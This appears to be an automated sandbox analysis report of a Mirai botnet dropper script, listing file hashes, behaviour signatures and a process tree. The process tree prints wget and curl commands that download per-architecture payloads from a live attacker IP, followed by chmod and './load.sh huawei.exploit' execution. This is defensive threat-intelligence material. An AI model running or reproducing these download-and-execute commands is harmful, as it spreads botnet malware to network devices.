Overview

overview

10

Static

static

1

R0I24_na.sh

ubuntu-18.04-amd64

10

R0I24_na.sh

debian-9-armhf

10

R0I24_na.sh

debian-9-mips

10

R0I24_na.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    17/10/2024, 07:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    R0I24_na.sh

  • Size

    4KB

  • MD5

    d97f217a1dad90ac2a811c2684010888

  • SHA1

    7aedac430643630d8d80e361279e85bf4a583679

  • SHA256

    81a013dd15f6f42dc9b2f72ebfc7b5ecbc3be11b6e7777618bc500fa910102f3

  • SHA512

    a98fe8d2822b641beaa27829c6e393974f666bdc502e459ed0e4e27f1213178fe92938960edcf81d4bcc30f7c0aec157dc353f34fb2652bff4c6a75996ac337f

  • SSDEEP

    96:vNVjkNw4tNx/oNN7sNdMdEpF7Nn9qNUsBN2mnNRf4N3tiNueXNySjNGWvNPl9:GO4Fk

Score
10/10
miraiunstableantivmbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Contacts a large (190333) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 7 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 7 IoCs
  • Modifies Watchdog functionality 1 TTPs 4 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 4 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Changes its process name 2 IoCs
  • Checks CPU configuration 1 TTPs 7 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 16 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/R0I24_na.sh
    /tmp/R0I24_na.sh
    1⤵
    • Writes file to tmp directory
    PID:649
    • /usr/bin/wget
      wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
      2⤵
      • Writes file to tmp directory
      PID:651
    • /usr/bin/curl
      curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:665
    • /bin/cat
      cat db0fa4b8db0333367e9bda3ab68b8042.x86
      2⤵
        PID:676
      • /bin/chmod
        chmod +x db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg9
        2⤵
        • File and Directory Permissions Modification
        PID:677
      • /tmp/load.sh
        ./load.sh huawei.exploit
        2⤵
        • Executes dropped EXE
        PID:678
      • /usr/bin/wget
        wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:681
      • /usr/bin/curl
        curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:684
      • /bin/cat
        cat db0fa4b8db0333367e9bda3ab68b8042.mips
        2⤵
        • System Network Configuration Discovery
        PID:690
      • /bin/chmod
        chmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg9
        2⤵
        • File and Directory Permissions Modification
        PID:692
      • /tmp/load.sh
        ./load.sh huawei.exploit
        2⤵
        • Executes dropped EXE
        PID:693
      • /usr/bin/wget
        wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
        2⤵
        • Writes file to tmp directory
        PID:696
      • /usr/bin/curl
        curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:701
      • /bin/cat
        cat db0fa4b8db0333367e9bda3ab68b8042.mpsl
        2⤵
          PID:707
        • /bin/chmod
          chmod +x db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg9
          2⤵
          • File and Directory Permissions Modification
          PID:709
        • /tmp/load.sh
          ./load.sh huawei.exploit
          2⤵
          • Executes dropped EXE
          PID:710
        • /usr/bin/wget
          wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
          2⤵
          • Writes file to tmp directory
          PID:713
        • /usr/bin/curl
          curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:718
        • /bin/cat
          cat db0fa4b8db0333367e9bda3ab68b8042.arm
          2⤵
            PID:725
          • /bin/chmod
            chmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg9
            2⤵
            • File and Directory Permissions Modification
            PID:728
          • /tmp/load.sh
            ./load.sh huawei.exploit
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Writes file to system bin folder
            • Changes its process name
            • Reads runtime system information
            PID:730
          • /usr/bin/wget
            wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
            2⤵
            • Writes file to tmp directory
            PID:732
          • /usr/bin/curl
            curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:745
          • /bin/cat
            cat db0fa4b8db0333367e9bda3ab68b8042.arm5
            2⤵
              PID:751
            • /bin/chmod
              chmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg9
              2⤵
              • File and Directory Permissions Modification
              PID:752
            • /tmp/load.sh
              ./load.sh huawei.exploit
              2⤵
              • Executes dropped EXE
              • Reads runtime system information
              PID:753
            • /usr/bin/wget
              wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
              2⤵
              • Writes file to tmp directory
              PID:755
            • /usr/bin/curl
              curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:759
            • /bin/cat
              cat db0fa4b8db0333367e9bda3ab68b8042.arm6
              2⤵
                PID:790
              • /bin/chmod
                chmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg9
                2⤵
                • File and Directory Permissions Modification
                PID:791
              • /tmp/load.sh
                ./load.sh huawei.exploit
                2⤵
                • Executes dropped EXE
                • Reads runtime system information
                PID:792
              • /usr/bin/wget
                wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
                2⤵
                • Writes file to tmp directory
                PID:793
              • /usr/bin/curl
                curl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:794
              • /bin/cat
                cat db0fa4b8db0333367e9bda3ab68b8042.arm7
                2⤵
                  PID:795
                • /bin/chmod
                  chmod +x db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh R0I24_na.sh systemd-private-451f5880870a4cb6bcf9ecbd9849d1d3-systemd-timedated.service-EiKwg9
                  2⤵
                  • File and Directory Permissions Modification
                  PID:796
                • /tmp/load.sh
                  ./load.sh huawei.exploit
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:797
                • /usr/bin/wget
                  wget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
                  2⤵
                  • Writes file to tmp directory
                  PID:799

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86
                Filesize

                33KB

                MD5

                6d1b6e91b1e2037fbf62ca7ddcf04932

                SHA1

                d0769095ec2e678074eb206b3537022129c1a776

                SHA256

                7f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782

                SHA512

                7397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38

                Download Submit

              • /tmp/load.sh
                Filesize

                35KB

                MD5

                fd5d7deebbb62aee931a1701a1042450

                SHA1

                4adc94ce9de13647815a16d6514b73e109c80785

                SHA256

                7a36bd7a9d19b6d48807264712141dd0543ffebd9db923a76799ffd687f352c9

                SHA512

                cb7beeb8d88ad48ac447b69b215738cdf1d706cb88c4945d0a0837c07dfe41a74107f9c4d7fccc5c7e5719ee9a912452ba3c53c360252bd46978f5d27c1b6df4

                Download Submit

              • /tmp/load.sh
                Filesize

                37KB

                MD5

                144cc0c6dfb6f6e395065b02825a9ad1

                SHA1

                dfe5d7d8bef4511b42be1ae0235f7469d97bf789

                SHA256

                117cd63b79b8c0d3753ac6907206872d6527c2d6a641776c1021302d5dcec2b2

                SHA512

                9e5ca9ee3ebef09688d74de6bb4af9d6c1003173ee5846cd2370d4774e9bc92fef317113b19529cd2a5b1d18a38a626ebf6ed2da05e6c7b66e0d1b69d8ddc5d5

                Download Submit

              • /tmp/load.sh
                Filesize

                34KB

                MD5

                b478298246ee6d313f4f576d0f7ec4cd

                SHA1

                94d25c6d4cfb1e218120d378d14c8d5ab868363b

                SHA256

                ed04f35cc6c4bef7ea8bf398436da916ebfab2490c10bd1d59df70f648e80df5

                SHA512

                83f67116e5c7074dcfa0e98d94697a0db2bdcaed15060aa31ed6a20eb543fd1d10d8fe26856178f78cc7402531de358e4b6c1d294086b18ab891d23954e78307

                Download Submit

              • /tmp/load.sh
                Filesize

                30KB

                MD5

                d8893525da7152c787dcc7d6309a61ba

                SHA1

                87fa7fb894caaa77a9caa7bca6a5fd3fbe09f7cd

                SHA256

                2a1b03ac26cc72118fb419de4bee3352adf536ee4d5472e8cee14150ca53b8ef

                SHA512

                8fcf808c627c080350adcf005df853a6c1f3fb3e3b2b5d2745a972dcc4064ff731f7cebbbd7d4e8c9ade91727f587356f844b783fa6c90a2191b80a38ca1f6e6

                Download Submit

              • /tmp/load.sh
                Filesize

                58KB

                MD5

                7324dbeb098c782561c906ebab3ee1ea

                SHA1

                e6f5ea8561a51cd096aeb2e10a98e17199e399f8

                SHA256

                730859ff16c34d990ddd18509a1a3c22a9b582944fc68e6411f9895b79239895

                SHA512

                c5f519317a58b39d44af0c137a1f3cc8634a1306602e210f342e560ac68fba3fef05628b1058617e0673e104a1d06da98a74f2ac0817830146a0f955a5474f4d

                Download Submit